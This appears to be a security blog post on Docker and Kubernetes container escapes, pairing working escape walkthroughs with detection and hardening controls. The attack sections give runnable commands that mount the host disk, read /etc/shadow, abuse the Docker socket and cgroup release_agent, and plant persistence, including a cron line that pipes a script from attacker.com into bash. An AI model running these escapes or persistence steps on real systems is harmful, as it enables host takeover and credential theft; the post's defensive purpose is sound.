What makes a container 'escape' different from a normal privilege escalation?

A container escape crosses the isolation boundary between the container's namespaces and the host operating system. Unlike privilege escalation within a single OS context, an escape lets an attacker break out of the containerized environment entirely, gaining access to host processes, the host filesystem, and potentially other containers. The goal is to move from the restricted container namespace into the host's root namespace.

What does the --privileged Docker flag actually do?

The --privileged flag disables nearly all container isolation mechanisms simultaneously. It grants every Linux capability (CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_SYS_PTRACE, and the rest of the roughly 40 capabilities the kernel defines), disables seccomp filtering, disables AppArmor confinement, and gives the container access to all host devices via /dev. A privileged container has essentially the same access to the host kernel as a process running directly on the host as root.

How does mounting the Docker socket inside a container enable escape?

The Docker socket (/var/run/docker.sock) is a Unix domain socket through which the Docker CLI communicates with the Docker daemon running as root on the host. If a container has this socket mounted, any process inside the container can send API requests to the Docker daemon with the same authority as root on the host. An attacker can use this to spawn a new privileged container with the host filesystem mounted, effectively gaining full root access to the host.

What was CVE-2019-5736 and which container runtimes were affected?

CVE-2019-5736 was a critical vulnerability in runc, the low-level container runtime used by Docker, containerd, and CRI-O, and through them by Kubernetes. It allowed a malicious container image, or an attacker with root inside an existing container that is later entered with docker exec, to overwrite the host runc binary during container execution. Because runc runs as root on the host, this enabled full host compromise. CVSS score: 8.6. runc versions through 1.0-rc6 were affected; the fix shipped in runc 1.0-rc7 and Docker 18.09.2. Patches were released February 11, 2019.

What is CVE-2022-0492 and how does it relate to container escape?

CVE-2022-0492 is a Linux kernel vulnerability in the cgroup v1 release_agent feature. The kernel did not verify that a process writing release_agent held CAP_SYS_ADMIN in the initial user namespace. Under certain conditions (cgroup v1 in use, user namespaces enabled, and no seccomp, AppArmor, or SELinux policy blocking the calls), a process inside a container could gain CAP_SYS_ADMIN in a new user namespace, mount a cgroup hierarchy, and abuse the release_agent mechanism to execute arbitrary commands on the host as root. CVSS score: 7.8. It affected kernel versions before 5.17-rc3; the fix was released in February 2022.

Does Kubernetes automatically prevent container escapes?

No. Kubernetes orchestrates containers but inherits the same underlying isolation mechanisms (and weaknesses) as the container runtime. It also exposes pod-level settings that can enable escape when misused: hostPID: true, hostNetwork: true, hostPath volume mounts of sensitive directories, and privileged: true in a container's security context. Pod Security Admission (which replaced PodSecurityPolicy) and tools like OPA Gatekeeper can prevent these insecure pod specs from being deployed.

What is rootless Docker and does it fully prevent container escapes?

Rootless Docker runs the Docker daemon itself as a non-root user using user namespaces. This significantly reduces the impact of a container escape because the daemon process does not have host root privileges. However, rootless mode does not eliminate all escape vectors — vulnerabilities in the kernel's user namespace implementation, or misconfigurations allowing the container process to gain capabilities within the user namespace, can still lead to privilege escalation. It is a strong defense-in-depth measure, not a complete solution.

Container Escape: Breaking Out of Docker Into the Host

Containers are not virtual machines. This is one of the most consequential misunderstandings in modern infrastructure security. Where a virtual machine has a full hypervisor isolation layer separating guest and host kernels, a container shares the host kernel directly. The isolation that makes containers lightweight — Linux namespaces and cgroups — is also what makes them escapable when misconfigured or when vulnerabilities are present.

This post examines how container isolation works at the kernel level, walks through the primary escape vectors with working demonstrations, covers real CVEs that enabled escapes, and provides a concrete detection and hardening framework.

How Container Isolation Works

A container is, at its core, a process (or group of processes) on the host with a restricted view of the system. That restriction is implemented through three kernel mechanisms:

Linux Namespaces

Namespaces partition global system resources so that each container sees its own isolated instance:

Namespace	Isolates
`pid`	Process IDs — container processes cannot see host processes
`net`	Network interfaces, routing tables, iptables rules
`mnt`	Filesystem mount points
`uts`	Hostname and domain name
`ipc`	System V IPC, POSIX message queues
`user`	User and group IDs (remapped)
`cgroup`	Cgroup root directory (added in kernel 4.6)

A container escape fundamentally involves gaining access to the host’s root namespace — the namespace context shared by all host processes.
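
To make the namespace idea concrete, the sketch below compares the namespace identifiers that Linux exposes under /proc/<pid>/ns. It is only an illustration: the helper names (parse_ns_link, read_namespaces, shared_namespaces) are made up for this post, and reading another process's namespace links generally requires sufficient privileges.

```python
import os
import re

# Targets of /proc/<pid>/ns/* symlinks look like "pid:[4026531836]".
NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(link: str) -> tuple[str, int]:
    """Split a namespace symlink target into (type, inode number)."""
    match = NS_LINK.match(link)
    if match is None:
        raise ValueError(f"unexpected namespace link: {link!r}")
    return match.group(1), int(match.group(2))


def read_namespaces(pid: str = "self") -> dict[str, int]:
    """Return {entry name: namespace inode} for a process (Linux only)."""
    ns_dir = f"/proc/{pid}/ns"
    namespaces = {}
    for entry in os.listdir(ns_dir):
        _, inode = parse_ns_link(os.readlink(os.path.join(ns_dir, entry)))
        namespaces[entry] = inode
    return namespaces


def shared_namespaces(a: dict[str, int], b: dict[str, int]) -> list[str]:
    """Names of namespaces that two processes have in common."""
    return sorted(name for name in a if name in b and a[name] == b[name])
```

On a Linux host, shared_namespaces(read_namespaces("self"), read_namespaces("1")) run as root from a host shell would normally list every namespace type, whereas a well-isolated container process shares few or none with the host's PID 1.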

Control Groups (cgroups)

Cgroups limit resource consumption (CPU, memory, disk I/O, network) for process groups. They do not provide security isolation but they are critical for container functionality.

Linux Capabilities

Root on Linux is not monolithic. The kernel divides root’s traditional privileges into discrete capabilities: CAP_NET_BIND_SERVICE, CAP_SYS_ADMIN, CAP_CHOWN, etc. Docker drops many capabilities by default but retains a set sufficient for typical application use. The key attack surface: any capability that enables interaction with the host kernel in dangerous ways.
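
The capability set of a process appears as a hexadecimal bitmask in the CapEff field of /proc/<pid>/status. The following sketch decodes such a mask into names, using the capability numbering from the kernel's capability header; the function name decode_capabilities is an illustrative choice, and bits beyond the table are reported as unknown rather than guessed.

```python
# Capability names indexed by bit position (CAP_CHOWN is bit 0).
CAPABILITY_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_capabilities(mask_hex: str) -> list[str]:
    """Translate a CapEff-style hex mask into a list of capability names."""
    mask = int(mask_hex, 16)
    names = []
    for bit in range(mask.bit_length()):
        if mask & (1 << bit):
            if bit < len(CAPABILITY_NAMES):
                names.append(CAPABILITY_NAMES[bit])
            else:
                names.append(f"CAP_UNKNOWN_{bit}")
    return names


def has_capability(mask_hex: str, name: str) -> bool:
    """True if the named capability is set in the mask."""
    return name in decode_capabilities(mask_hex)
```

For example, has_capability("00000000a80425fb", "CAP_SYS_ADMIN") is False for the mask a default Docker container typically reports, while a fully set mask such as 0000003fffffffff includes it.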

Escape Vector 1: Privileged Container

The most common and straightforward escape path is a container run with --privileged or with privileged: true in its Kubernetes pod spec.

Attack Flow

Attacker gains code execution inside a privileged container (RCE via web app vulnerability, supply chain attack on container image, etc.)
Container process can access all host devices via /dev
Attacker mounts the host filesystem by identifying and mounting the host’s root disk

# Step 1: Confirm we're in a privileged container
grep CapEff /proc/1/status
# CapEff: 0000003fffffffff  (all capabilities enabled = privileged; the exact mask varies with kernel version)

# Step 2: Identify the host disk device
fdisk -l 2>/dev/null | grep "^Disk /dev/sd"
# or: lsblk

# Step 3: Mount host root filesystem (/dev/sda1 is an example; use the device found in Step 2)
mkdir /tmp/hostfs
mount /dev/sda1 /tmp/hostfs

# Step 4: Chroot into host filesystem for full interactive access
chroot /tmp/hostfs /bin/bash

# Now we have a root shell on the host filesystem
cat /etc/shadow
ls /root/
crontab -l  # read host cron jobs
exit        # leave the chroot; the steps below use /tmp/hostfs paths from the container shell

# Step 5: Persistence: add SSH key to host root
mkdir -p /tmp/hostfs/root/.ssh
echo "ssh-rsa AAAA...attacker_key..." >> /tmp/hostfs/root/.ssh/authorized_keys

# Or write a host-level cron job
echo "* * * * * root curl http://attacker.com/shell | bash" >> /tmp/hostfs/etc/crontab

Alternative: Privileged + nsenter

# Use nsenter to enter host namespaces directly
# Requires the container to share the host PID namespace (e.g. --privileged --pid=host),
# so that PID 1 is the host's init rather than the container's own init process
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# This drops you into a bash shell in the host's mount, UTS, IPC, network, and PID namespaces
# Equivalent to running bash directly on the host
hostname  # shows host hostname, not container hostname
ps aux    # shows all host processes

Escape Vector 2: Docker Socket Mount

When /var/run/docker.sock is mounted inside a container, any process in that container can talk to the Docker daemon — which runs as root on the host with full container management authority.

This is extremely common in CI/CD pipelines (Jenkins, GitLab Runner, Drone) that mount the Docker socket to enable “Docker-in-Docker” builds.

Attack Flow

Attacker gains code execution inside a container with /var/run/docker.sock mounted
Docker CLI (or HTTP API via curl/python) is used to create a new container
The new container is started with privileged mode and the host filesystem mounted
Attacker executes commands in the new container to interact with the host

# Step 1: Verify Docker socket is available
ls -la /var/run/docker.sock
# srw-rw---- 1 root docker /var/run/docker.sock

# Step 2: If Docker CLI is not available, use curl with Unix socket
curl --unix-socket /var/run/docker.sock http://localhost/version

# Step 3a: Docker CLI approach: spawn privileged container with host fs
docker run -v /:/hostfs -it --privileged alpine chroot /hostfs /bin/bash

# Step 3b: API approach using curl (no docker CLI required)
# Create container (URL quoted so the shell does not interpret the ?)
curl --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "alpine",
    "Cmd": ["/bin/sh", "-c", "chroot /hostfs cat /etc/shadow"],
    "HostConfig": {
      "Binds": ["/:/hostfs:rw"],
      "Privileged": true
    }
  }' \
  -X POST "http://localhost/containers/create?name=escape"

# Start the container
curl --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape/start

# Read the command's output from the container logs
curl --unix-socket /var/run/docker.sock --output - \
  "http://localhost/containers/escape/logs?stdout=1&stderr=1"
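
From the defender's side, both of the escape vectors so far leave visible traces in a container's HostConfig, which docker inspect prints as JSON. The sketch below flags the settings discussed above. The function name escape_risks and the SENSITIVE_CAPS list are illustrative assumptions, and the check only looks at Binds, so mounts declared through other mechanisms would need extra handling.

```python
# Capabilities treated as high-risk here; this short list is illustrative only.
SENSITIVE_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE"}


def escape_risks(host_config: dict) -> list[str]:
    """Flag risky settings in the HostConfig object from `docker inspect`."""
    findings = []
    if host_config.get("Privileged"):
        findings.append("privileged mode")
    if host_config.get("PidMode") == "host":
        findings.append("host PID namespace")
    # Binds entries have the form "source:destination[:options]".
    for bind in host_config.get("Binds") or []:
        source = bind.split(":", 1)[0]
        if source.endswith("docker.sock"):
            findings.append(f"Docker socket mounted ({bind})")
        elif source == "/":
            findings.append(f"host root filesystem mounted ({bind})")
    for cap in host_config.get("CapAdd") or []:
        if cap.upper().removeprefix("CAP_") in SENSITIVE_CAPS:
            findings.append(f"sensitive capability added ({cap})")
    return findings
```

A possible way to feed it is to run docker inspect <container>, parse the output with json.loads, and pass the HostConfig object of each element to escape_risks.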

Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)

CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski, allowed a malicious container to overwrite the host runc binary and achieve code execution as root on the host.

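Affected versions: runc through 1.0-rc6 (fixed in 1.0-rc7), Docker < 18.09.2, containerd < 1.0.3

Vulnerability mechanism: During docker exec, runc enters the container and executes the requested binary. If the attacker has replaced that binary with something that resolves to /proc/self/exe (a symlink, or a script whose interpreter line is #!/proc/self/exe), the kernel ends up re-executing runc itself inside the container. A process in the container can then reach the host runc binary through /proc/<runc-pid>/exe, hold a file descriptor to it, and reopen that descriptor for writing once runc has exited, overwriting the binary on the host.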

Conceptual Attack Flow

Attacker creates a malicious container image (or modifies a running container) so that a commonly executed binary such as /bin/sh resolves to /proc/self/exe
When docker exec is invoked on the container, runc executes that binary and so re-executes itself inside the container
A waiting process in the container opens /proc/<runc-pid>/exe read-only to obtain a handle on the host runc binary
Once runc exits, the process reopens that handle for writing and writes a malicious payload over the runc binary on the host
The next time runc is invoked, for example on the next container exec or start, the malicious binary runs as root on the host

# Detection: check runc version
runc --version
# Patched releases report 1.0.0-rc7 or later; distribution packages may carry a backported fix under an older version string

# Check the runc version bundled with the Docker server
docker version | grep -A2 "runc:"

# Verify runc binary integrity
sha256sum "$(command -v runc)"
# Compare against known-good hash from distribution vendor

Patch released: February 11, 2019. CVSS: 8.6.
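
For fleet-wide checks, the version comparison can be automated. The sketch below parses a runc version string and reports whether it predates 1.0.0-rc7. The function names are hypothetical, and the result is only a first-pass signal, since distribution packages may backport the fix without changing the upstream version number.

```python
import re

# Matches "1.0.0-rc6", "1.0-rc6", "1.0.0~rc6", or "1.1.12" inside a longer string.
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:[-~]rc\.?(\d+))?")

# First upstream release containing the CVE-2019-5736 fix.
FIRST_FIXED = (1, 0, 0, 7)


def parse_runc_version(text: str) -> tuple[int, int, int, float]:
    """Return (major, minor, patch, rc); final releases sort after any rc."""
    match = VERSION_RE.search(text)
    if match is None:
        raise ValueError(f"no version found in {text!r}")
    major, minor = int(match.group(1)), int(match.group(2))
    patch = int(match.group(3) or 0)
    rc = int(match.group(4)) if match.group(4) else float("inf")
    return (major, minor, patch, rc)


def predates_cve_2019_5736_fix(version_text: str) -> bool:
    """True if the upstream version string is older than 1.0.0-rc7."""
    return parse_runc_version(version_text) < FIRST_FIXED
```

Passing the first line of runc --version output, such as "runc version 1.0.0-rc6", is enough; the regular expression skips the leading words.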

Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)

This vulnerability abused the release_agent feature in cgroup v1. When a cgroup becomes empty (all processes exit), the kernel executes the script specified in release_agent as root in the host namespace.

Conditions required for exploitation:

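Container must be able to mount cgroup filesystems, which requires CAP_SYS_ADMIN (held directly, or obtained by unsharing into a new user namespace)
cgroup v1 must be in use (not cgroup v2)
User namespaces must be available, and no seccomp, AppArmor, or SELinux policy may block the unshare and mount calls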

# Step 1: Check if cgroup v1 is available and we can mount it
head -5 /proc/1/cgroup
# Per-controller lines (e.g., 12:memory:/docker/<id>) mean cgroup v1 is active;
# a single 0::/ line means cgroup v2

# Step 2: Create a new cgroup hierarchy with a release_agent
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Step 3: Point release_agent at the payload, using its path as seen from the host
echo 1 > /tmp/cgrp/x/notify_on_release
# Host-side path of this container's overlay upper directory
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit" > /tmp/cgrp/release_agent

# Step 4: Write the payload that runs on the host
# Unquoted heredoc so $host_path expands: the host writes its output into the container's filesystem
cat > /exploit << EOF
#!/bin/sh
ps aux > $host_path/output
chmod 777 $host_path/output
EOF
chmod a+x /exploit

# Step 5: Trigger the cgroup-empty notification by moving a short-lived process into the cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Step 6: Read the output file that was written by the host-level release_agent
cat /output  # Contains host process listing

Patch released: February 2022, kernel 5.17-rc3. CVSS: 7.8.
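
Because the attack depends on cgroup v1, a quick exposure check is to see which cgroup hierarchies a process belongs to. The sketch below parses the hierarchy-ID:controller-list:path lines of /proc/<pid>/cgroup and returns the v1 controllers it finds; the function name is an illustrative choice.

```python
def cgroup_v1_controllers(proc_cgroup_text: str) -> list[str]:
    """List cgroup v1 controllers named in the contents of /proc/<pid>/cgroup.

    Each line has the form "hierarchy-ID:controller-list:path". The cgroup v2
    unified hierarchy appears as "0::<path>" and is skipped.
    """
    controllers = []
    for line in proc_cgroup_text.splitlines():
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue
        hierarchy_id, controller_list, _path = parts
        if hierarchy_id == "0" and controller_list == "":
            continue  # cgroup v2 entry
        controllers.extend(c for c in controller_list.split(",") if c)
    return sorted(controllers)


def uses_cgroup_v1(proc_cgroup_text: str) -> bool:
    """True if at least one cgroup v1 hierarchy is attached."""
    return bool(cgroup_v1_controllers(proc_cgroup_text))
```

An empty result for the text of /proc/self/cgroup suggests the process is on a pure cgroup v2 system, where the release_agent file does not exist.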

Real Incident: Docker Daemon Exposed Over TCP

In 2019, multiple cryptocurrency mining campaigns (tracked by Palo Alto Unit 42 and Aqua Security) exploited Docker daemons that had been configured to listen on TCP port 2375 without TLS authentication — a configuration explicitly warned against in Docker documentation but commonly found in development environments.

Attack pattern:

Masscan/Shodan enumeration for port 2375 open on the internet
Connection to unauthenticated Docker API: curl http://target:2375/containers/json
Deploy a new container with host / mounted
Install cryptocurrency miner (XMRig) as a persistent host process via cron or systemd

Aqua Security estimated over 400 honeypot hits per day at the peak of these campaigns in 2019. Similar attacks targeting exposed Kubernetes API servers ran in parallel.
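
One way to catch this misconfiguration before an attacker does is to inspect the daemon configuration for TCP listeners without TLS verification. The sketch below reads the hosts and tlsverify keys of a daemon.json document. The function name is hypothetical, and the check is deliberately narrow: listeners passed on the dockerd command line (for example in a systemd unit) are not covered.

```python
import json


def unauthenticated_tcp_hosts(daemon_json_text: str) -> list[str]:
    """Return tcp:// listeners from daemon.json that lack TLS verification."""
    config = json.loads(daemon_json_text)
    if config.get("tlsverify") is True:
        return []  # client certificates are required on TCP listeners
    hosts = config.get("hosts") or []
    return [host for host in hosts if host.startswith("tcp://")]
```

Calling it on the contents of /etc/docker/daemon.json and alerting on any non-empty result would be a reasonable starting point for a configuration audit.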

Detection with Falco

Falco is the de facto standard for runtime security monitoring of containers. It uses eBPF or kernel module probes to detect syscall-level anomalies.

# /etc/falco/rules.d/container-escape.yaml

# Detect privileged container creation
- rule: Create Privileged Container
  desc: Detect creation of a privileged container
  condition: >
    container.id != host
    and evt.type = container
    and container.privileged = true
  output: >
    Privileged container started (user=%user.name command=%proc.cmdline
    container_id=%container.id image=%container.image.repository)
  priority: WARNING
  tags: [container, privilege-escalation, T1611]

# Detect Docker socket access from within a container
# Note: clients usually reach a Unix socket with connect() rather than open(),
# so this condition may need an additional evt.type = connect clause
- rule: Docker Socket Accessed from Container
  desc: Detect access to Docker socket from inside a container
  condition: >
    open_write
    and container
    and fd.name = /var/run/docker.sock
  output: >
    Docker socket accessed inside container (user=%user.name
    command=%proc.cmdline container=%container.name)
  priority: CRITICAL
  tags: [container, escape, T1611]

# Detect nsenter execution (namespace escape tool)
- rule: nsenter Executed in Container
  desc: Detect nsenter used to enter host namespaces
  condition: >
    spawned_process
    and container
    and proc.name = nsenter
  output: >
    nsenter executed in container (user=%user.name args=%proc.args
    container=%container.name pid=%proc.pid)
  priority: CRITICAL

# Detect mount of host /proc or /dev
- rule: Sensitive Host Filesystem Mounted
  desc: Detect mounting of sensitive host paths
  condition: >
    spawned_process
    and container
    and proc.name = mount
    and (proc.args contains "/proc" or proc.args contains "/dev" or proc.args contains "/sys")
  output: >
    Sensitive host filesystem mounted in container
    (command=%proc.cmdline container=%container.name)
  priority: CRITICAL
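
When Falco is configured to emit JSON, each alert is one JSON object per line with fields such as rule, priority, and output. The sketch below filters such a stream down to alerts at or above a chosen priority, which is a simple way to route the CRITICAL escape rules to a pager. The function name and the default threshold are assumptions made for illustration.

```python
import json

# Falco priorities from most to least severe.
PRIORITIES = [
    "emergency", "alert", "critical", "error",
    "warning", "notice", "informational", "debug",
]


def alerts_at_or_above(lines, threshold: str = "critical") -> list[tuple[str, str]]:
    """Return (rule, output) pairs for JSON alerts at or above a priority."""
    limit = PRIORITIES.index(threshold.lower())
    selected = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON log lines
        if not isinstance(event, dict):
            continue
        priority = str(event.get("priority", "")).lower()
        if priority in PRIORITIES and PRIORITIES.index(priority) <= limit:
            selected.append((event.get("rule", "?"), event.get("output", "")))
    return selected
```

It accepts any iterable of lines, so an open log file or sys.stdin can be passed directly.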

Audit Log Monitoring

# Kubernetes audit log: detect privileged pod creation
# Query audit logs for pods with privileged security context
# (requestObject is only recorded at the Request audit level or higher)
python3 -c "
import sys, json
for line in sys.stdin:
    try:
        event = json.loads(line)
    except ValueError:
        continue  # skip lines that are not valid JSON
    if event.get('verb') in ['create', 'update'] and \
       event.get('objectRef', {}).get('resource') == 'pods':
        spec = (event.get('requestObject') or {}).get('spec', {})
        for container in spec.get('containers', []):
            sc = container.get('securityContext') or {}
            if sc.get('privileged'):
                print(f\"ALERT: Privileged pod: {event.get('objectRef',{}).get('name')} by {event.get('user',{}).get('username')}\")
" < /var/log/kubernetes/audit.log

# Check Docker daemon audit logs (if auditd is configured)
ausearch -k docker --interpret | grep -E "privileged|/var/run/docker.sock"
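
The same audit data can be checked for the other risky pod settings named earlier (hostPID, hostNetwork, hostPath volumes), not just privileged containers. The sketch below takes a pod spec as a dictionary, for instance the spec object of a requestObject from the audit log, and lists what it finds. The function name pod_escape_risks is hypothetical.

```python
def pod_escape_risks(pod_spec: dict) -> list[str]:
    """Flag pod spec settings that weaken isolation from the host."""
    findings = []
    for flag in ("hostPID", "hostNetwork"):
        if pod_spec.get(flag) is True:
            findings.append(f"{flag}: true")
    for volume in pod_spec.get("volumes") or []:
        host_path = (volume.get("hostPath") or {}).get("path")
        if host_path is not None:
            findings.append(f"hostPath volume: {host_path}")
    # Init containers run with the same kind of security context as regular ones.
    containers = (pod_spec.get("containers") or []) + (pod_spec.get("initContainers") or [])
    for container in containers:
        security_context = container.get("securityContext") or {}
        if security_context.get("privileged") is True:
            findings.append(f"privileged container: {container.get('name', '?')}")
    return findings
```

An empty list does not prove a pod is safe; it only means none of these specific settings were present.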

Defense and Hardening

Control 1: Rootless Docker

# Install rootless Docker (requires uidmap package)
dockerd-rootless-setuptool.sh install

# Point the Docker CLI at the rootless daemon's socket
export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock

# Verify rootless operation
docker info | grep -i "rootless"
# Should list "rootless" under Security Options
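
Whether root inside a container corresponds to root on the host can be read from /proc/<pid>/uid_map, where each line maps a range of IDs inside the namespace to a range outside it. The sketch below resolves which outer UID backs UID 0 inside; the function name is an illustrative assumption.

```python
from typing import Optional


def host_uid_for_container_root(uid_map_text: str) -> Optional[int]:
    """Resolve the outer UID that UID 0 maps to, given uid_map contents.

    Each line holds three integers: first ID inside the namespace, first ID
    outside it, and the length of the mapped range. Returns None if UID 0
    is not mapped at all.
    """
    for line in uid_map_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        inside, outside, length = (int(field) for field in fields)
        if inside <= 0 < inside + length:
            return outside - inside
    return None
```

A result of 0 means root in the namespace is real root on the host (or on the parent namespace, if namespaces are nested); with rootless Docker the result would normally be the unprivileged user's UID.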

Control 2: Seccomp Profiles

Seccomp (Secure Computing Mode) restricts which syscalls a container process can make. The default Docker seccomp profile blocks ~44 syscalls. Apply stricter profiles:

# Apply the default seccomp profile explicitly
docker run --security-opt seccomp=/etc/docker/seccomp-default.json myapp

# Use a custom profile that additionally blocks mount
# Deny-list form: everything is allowed except the syscalls named below.
# In production, start from Docker's default profile and remove syscalls from it,
# since a bare deny list is more permissive than the default.
cat > /etc/docker/seccomp-restricted.json << 'EOF'
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["mount", "umount2", "pivot_root"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
EOF
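
Before deploying a custom profile, it helps to confirm what it actually does to the syscalls you care about. The sketch below evaluates a seccomp profile in the JSON layout Docker uses (defaultAction plus a syscalls list of names and action). It is a simplification under stated assumptions: argument filters and capability-conditional rules are ignored, and the first rule naming a syscall is taken as decisive. The function names are hypothetical.

```python
import json


def effective_action(profile: dict, syscall: str) -> str:
    """Action applied to a syscall, ignoring argument and capability conditions."""
    for rule in profile.get("syscalls") or []:
        if syscall in (rule.get("names") or []):
            return rule["action"]
    return profile["defaultAction"]


def still_allowed(profile_text: str, syscalls: list[str]) -> list[str]:
    """Subset of the given syscalls that the profile would allow."""
    profile = json.loads(profile_text)
    return [name for name in syscalls if effective_action(profile, name) == "SCMP_ACT_ALLOW"]
```

For instance, still_allowed(profile_text, ["mount", "umount2", "pivot_root"]) returning an empty list indicates that the escape-relevant mount syscalls are all denied by the profile.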

Control 3: AppArmor / SELinux

# Verify AppArmor is active for Docker
docker info | grep -i apparmor
# Should show: Security Options: apparmor

# Apply a custom AppArmor profile
cat > /etc/apparmor.d/docker-no-escape << 'EOF'
#include <tunables/global>
profile docker-no-escape flags=(attach_disconnected,mediate_deleted) {
  #include <abstractions/base>
  # Allow general file, network, and capability use; the deny rules below carve out exceptions
  file,
  network,
  capability,
  deny mount,
  deny /proc/sysrq-trigger rwklx,
  deny /proc/mem rwklx,
  deny /proc/kcore rwklx,
  deny /sys/** wklx,
}
EOF
apparmor_parser -r /etc/apparmor.d/docker-no-escape
docker run --security-opt apparmor=docker-no-escape myapp

Control 4: Drop Capabilities and Read-Only Root Filesystem

# Run with minimal capabilities and read-only filesystem
docker run \
  --cap-drop ALL \
  --cap-add NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp \
  --security-opt no-new-privileges \
  myapp

# Equivalent Kubernetes pod spec
cat << 'EOF'
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop:
      - ALL
    add:
      - NET_BIND_SERVICE
EOF

Control 5: OPA Gatekeeper Policy

# Gatekeeper ConstraintTemplate to block privileged containers
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: k8spspprivilegedcontainer
spec:
  crd:
    spec:
      names:
        kind: K8sPSPPrivilegedContainer
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package k8spspprivilegedcontainer
        violation[{"msg": msg}] {
          container := input.review.object.spec.containers[_]
          container.securityContext.privileged == true
          msg := sprintf("Container %v must not run as privileged", [container.name])
        }
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
  name: psp-privileged-container
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["Pod"]

MITRE ATT&CK Mapping

T1611 — Escape to Host: Adversaries may break out of a container to gain access to the host operating system.
T1610 — Deploy Container: Deploy a malicious container into a compromised environment to facilitate escape.
T1552.007 — Container API: Access container runtime APIs to gather credentials or escalate privileges.
